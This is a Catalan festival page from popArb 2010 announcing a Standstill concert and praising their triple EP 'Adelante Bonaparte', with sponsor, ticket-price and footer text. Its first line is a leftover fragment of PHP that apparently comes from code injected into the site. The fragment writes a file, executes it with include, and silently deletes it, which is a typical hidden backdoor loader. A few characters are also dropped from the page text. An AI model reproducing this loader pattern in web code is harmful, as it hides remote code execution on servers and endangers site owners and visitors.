");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> popArb 2010 : cartell : Standstill

popArb - Festival de Música Independent feta a Catalunya. Arbucies, Girona

Standstill

divendres 25 de juny. 2010
Montsoriu (Can Cassó) 01:00

[text provisional]

“Adelante Bonaparte" és el nou projecte de Standstill, un triple EP. A l'endinsar-se en ell, al llarg de mes d'una hora de sorpreses successives i cançons que des de la primera escolta sonen a "nou clàssic", l'oïdor no té altra opció que la de deixar-se dur, més que mai, per un torrent de creativitat i sensibilitat. Es tracta de tres discos, independents i complementaris, que s'ordenen cronològicament en el temps, i que per tant parlen sobre ell; sobre la nostra perpètua fugida cap a endavant, sobre el que ens deixa i el que es queda. Un sincer i bell exercici completat per un nou espectacle escènic que ho presenta i un projecte de creació col·lectiva que ho complementa. I és que possiblement només un grup amb la seva inquietud i experiència (amb 4 llargs a les seves esquenes, responsable de la seva pròpia discogràfica, els seus propis films, espectacles escènics, i d'haver signat -segons més d'un mitjà especialitzat- el millor disc nacional de la dècada passada) podria -o voldria- plantejar un projecte d'aquestes característiques.

Es podria dir que "Adelante Bonaparte" és el disc mes profund i ambiciós artísticament de Standstill per volum i concepció, però, en altre joc de contraris, alhora conté les cançons més directes i senzilles de la seva discografia. Melodies i frases difícils d'oblidar acompanyades per una instrumentació més bàsica de l'acostumat converteixen al disc en un malabarisme que no ho sembla i en l'obra més completa de tota la seva discografia. I és que cada vegada que alguna característica destaca en Standstill, el seu contrari apareix i torna a deixar la mateixa sensació d'estar davant un grup diferent a la resta, que va traient discos - cada vegada mes reconeguts - i avançant en una fèrtil fugida cap a endavant que va obrint el seu camí i el d'uns altres.

 

» +imatges

Organitzen: Ajuntament d'Arbcies, Cultura Dispersa

Collaboren: Departament de Cultura i Mitjans de Comunicaci de la Generalitat de Catalunya, Diputaci de Girona, AiE

Mitjans Oficials: TV3, iCat fm

Recomanat per: Scanner fm, Enderrock, Nativa, Butxaca, TresC

Col·laboradors: Demasié, FETE, cupatges,Vialis-Aro, Guerrilla Sound

 

estrella damm

Estrella Damm patrocina el popArb 2010

Venda a ServiCaixa

atrapalo

Abonaments i entrades de dia a Servicaixa.com.

Divendres: 30€
Dissabte: 35€
Abonament: 45€

Consulteu Servicaixa.com per conèixer preu de gestió i descomptes aplicables.

popArb 2010 © | culturaDispersa SL | Avís LegalSobre el popArb
RSS | youtube/popArb2009 || myspace/poparb